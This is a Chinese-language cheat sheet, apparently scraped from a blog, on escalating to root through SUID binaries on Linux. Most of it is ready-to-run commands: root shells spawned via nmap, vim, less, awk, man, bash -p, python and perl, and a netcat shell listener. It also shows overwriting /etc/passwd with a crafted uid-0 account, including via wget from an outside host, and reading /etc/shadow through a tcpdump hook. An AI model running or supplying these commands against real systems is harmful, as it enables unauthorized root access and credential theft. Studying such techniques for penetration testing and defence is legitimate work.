描述
SUID代表设置的用户ID,是一种Linux功能,允许用户在指定用户的许可下执行文件。例如,Linux ping命令通常需要root权限才能打开网络套接字。通过将ping程序标记为SUID(所有者为root),只要低特权用户执行ping程序,便会以root特权执行ping。
SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。
当运行具有suid权限的二进制文件时,它将以其他用户身份运行,因此具有其他用户特权。它可以是root用户,也可以只是另一个用户。如果在程序中设置了suid,该位可以生成shell或以其他方式滥用,我们可以使用它来提升我们的特权。
以下是一些可用于产生SHELL的程序:
代码语言:javascript复制nmapvimlessmorenanocpmvfind查找suid和guid文件
代码语言:javascript复制Find SUIDfind / -perm -u=s -type f 2>/dev/nullFind GUIDfind / -perm -g=s -type f 2>/dev/null其他命令
代码语言:javascript复制查找SUID文件也可以使用 sudo -l 命令列出当前用户可执行的命令
常用提权方式
nmap
代码语言:javascript复制find / -perm -u = s -type f 2> / dev / null –查找设置了SUID位的可执行文件ls -la / usr / local / bin / nmap –让我们确认nmap是否设置了SUID位。Nmap的SUID位置1。很多时候,管理员将SUID位设置为nmap,以便可以有效地扫描网络,因为如果不使用root特权运行它,则所有的nmap扫描技术都将无法使用。
但是,nmap(2.02-5.21)存在交换模式,可利用提权,我们可以在此模式下以交互方式运行nmap,从而可以转至shell。如果nmap设置了SUID位,它将以root特权运行,我们可以通过其交互模式访问'root'shell。
代码语言:javascript复制nmap –interactive –运行nmap交互模式!sh –我们可以从nmap shell转到系统shellmsf中的模块为:
代码语言:javascript复制exploit/unix/local/setuid_nmap较新版可使用 --script 参数:
代码语言:javascript复制echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nsefind
代码语言:javascript复制touch testnc 反弹 shell:
代码语言:javascript复制find test -exec netcat -lvp 5555 -e /bin/sh ;vi/vim
打开vim,按下ESC
代码语言:javascript复制:set shell=/bin/sh:shell或者sudo vim -c '!sh'bash
代码语言:javascript复制bash -pbash-3.2# iduid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)less
代码语言:javascript复制less /etc/passwd!/bin/shmore
代码语言:javascript复制more /home/pelle/myfile!/bin/bashcp
覆盖 /etc/shadow 或 /etc/passwd
[zabbix@localhost ~]$ cat /etc/passwd >passwd
代码语言:javascript复制[zabbix@localhost ~]$ openssl passwd -1 -salt hack hack123$1$hack$WTn0dk2QjNeKfl.DHOUue0[zabbix@localhost ~]$ echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash' >> passwd[zabbix@localhost ~]$ cp passwd /etc/passwd[zabbix@localhost ~]$ su - hackPassword:[root@361way ~]# iduid=0(hack) gid=0(root) groups=0(root)[root@361way ~]# cat /etc/passwd|tail -1hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bashmv
覆盖 /etc/shadow 或 /etc/passwd
[zabbix@localhost ~]$ cat /etc/passwd >passwd[zabbix@localhost ~]$ openssl passwd -1 -salt hack hack123$1$hack$WTn0dk2QjNeKfl.DHOUue0[zabbix@localhost ~]$ echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash' >> passwd[zabbix@localhost ~]$ mv passwd /etc/passwd[zabbix@localhost ~]$ su - hackPassword:[root@361way ~]# iduid=0(hack) gid=0(root) groups=0(root)[root@361way ~]# cat /etc/passwd|tail -1hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bashnano
代码语言:javascript复制nano /etc/passwdawk
代码语言:javascript复制awk 'BEGIN {system("/bin/sh")}'man
代码语言:javascript复制man passwd!/bin/bashwget
代码语言:javascript复制wget http://192.168.56.1:8080/passwd -O /etc/passwdapache
仅可查看文件,不能弹 shell:
代码语言:javascript复制apache2 -f /etc/shadowtcpdump
代码语言:javascript复制echo $'idncat /etc/shadow' > /tmp/.testchmod x /tmp/.testsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z rootpython/perl/ruby/lua/php/etc
python
代码语言:javascript复制 python -c "import os;os.system('/bin/bash')"perl
代码语言:javascript复制exec "/bin/bash";一点以前的笔记
